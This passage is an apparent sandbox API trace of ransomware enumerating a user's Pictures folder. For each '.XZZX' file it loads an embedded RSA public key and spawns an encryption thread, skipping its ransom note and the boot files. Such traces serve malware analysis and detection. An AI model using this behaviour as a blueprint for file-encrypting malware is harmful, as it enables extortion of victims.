(in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.233] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1368 [0248.233] Sleep (dwMilliseconds=0x96) [0248.388] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.388] lstrcmpW (lpString1="6C73D824191052A8389547C51D5A36F0.XZZX", lpString2="..") returned 1 [0248.389] lstrcmpW (lpString1="6C73D824191052A8389547C51D5A36F0.XZZX", lpString2=".") returned 1 [0248.389] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.389] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="ntldr") returned 0x0 [0248.389] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="NTLDR") returned 0x0 [0248.389] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.389] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.389] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.389] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.389] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.389] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0248.389] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x136c [0248.389] Sleep (dwMilliseconds=0x96) [0248.544] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.544] lstrcmpW (lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX", lpString2="..") returned 1 [0248.544] lstrcmpW (lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX", lpString2=".") returned 1 [0248.544] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.544] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="ntldr") returned 0x0 [0248.544] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="NTLDR") returned 0x0 [0248.545] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.545] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.545] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.545] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.545] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.545] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0248.545] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1370 [0248.545] Sleep (dwMilliseconds=0x96) [0248.700] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.700] lstrcmpW (lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX", lpString2="..") returned 1 [0248.700] lstrcmpW (lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX", lpString2=".") returned 1 [0248.701] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.701] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="ntldr") returned 0x0 [0248.701] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="NTLDR") returned 0x0 [0248.701] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.701] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.701] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.701] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.701] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.701] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.701] lstrcpyW (in: lpString1=0x17cf1c, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0248.701] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.701] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1374 [0248.701] Sleep (dwMilliseconds=0x96) [0248.856] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0248.856] lstrcmpW (lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpString2="..") returned 1 [0248.856] lstrcmpW (lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpString2=".") returned 1 [0248.857] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0248.857] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="ntldr") returned 0x0 [0248.857] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="NTLDR") returned 0x0 [0248.857] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0248.857] StrStrW (lpFirst="7030D20732FB05AE512C0EDB3744E9F6.XZZX", lpSrch="ntdetect.com") returned 0x0 [0248.857] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0248.857] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0248.857] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0248.857] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.857] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7030D20732FB05AE512C0EDB3744E9F6.XZZX" | out: lpString1="7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned="7030D20732FB05AE512C0EDB3744E9F6.XZZX" [0248.857] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1378 [0248.857] Sleep (dwMilliseconds=0x96) [0249.012] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.012] lstrcmpW (lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpString2="..") returned 1 [0249.013] lstrcmpW (lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpString2=".") returned 1 [0249.013] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.013] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="ntldr") returned 0x0 [0249.013] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="NTLDR") returned 0x0 [0249.013] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.013] StrStrW (lpFirst="7852C7A011E028AD2E2E29A016150CF5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.013] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.013] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.013] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.013] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7852C7A011E028AD2E2E29A016150CF5.XZZX" | out: lpString1="7852C7A011E028AD2E2E29A016150CF5.XZZX") returned="7852C7A011E028AD2E2E29A016150CF5.XZZX" [0249.013] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x137c [0249.013] Sleep (dwMilliseconds=0x96) [0249.168] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.168] lstrcmpW (lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpString2="..") returned 1 [0249.169] lstrcmpW (lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpString2=".") returned 1 [0249.169] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.169] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="ntldr") returned 0x0 [0249.169] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="NTLDR") returned 0x0 [0249.169] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.169] StrStrW (lpFirst="7ABC26D22C977F5CF918EABE30B863A4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.169] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.169] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.169] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.169] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7ABC26D22C977F5CF918EABE30B863A4.XZZX" | out: lpString1="7ABC26D22C977F5CF918EABE30B863A4.XZZX") returned="7ABC26D22C977F5CF918EABE30B863A4.XZZX" [0249.169] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1380 [0249.170] Sleep (dwMilliseconds=0x96) [0249.325] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.325] lstrcmpW (lpString1="7E711D900E3B4440AF6B05F612702888.XZZX", lpString2="..") returned 1 [0249.325] lstrcmpW (lpString1="7E711D900E3B4440AF6B05F612702888.XZZX", lpString2=".") returned 1 [0249.325] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.325] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="ntldr") returned 0x0 [0249.325] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="NTLDR") returned 0x0 [0249.325] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.325] StrStrW (lpFirst="7E711D900E3B4440AF6B05F612702888.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.325] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.325] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.325] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0249.325] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7E711D900E3B4440AF6B05F612702888.XZZX" | out: lpString1="7E711D900E3B4440AF6B05F612702888.XZZX") returned="7E711D900E3B4440AF6B05F612702888.XZZX" [0249.325] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0249.325] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1384 [0249.325] Sleep (dwMilliseconds=0x96) [0249.480] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0249.480] lstrcmpW (lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpString2="..") returned 1 [0249.480] lstrcmpW (lpString1="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpString2=".") returned 1 [0249.480] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0249.481] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="ntldr") returned 0x0 [0249.481] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="NTLDR") returned 0x0 [0249.481] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0249.481] StrStrW (lpFirst="7EC795ED37AF1A88A52703F73BCFFED0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0249.481] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0249.481] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0249.481] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0249.481] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 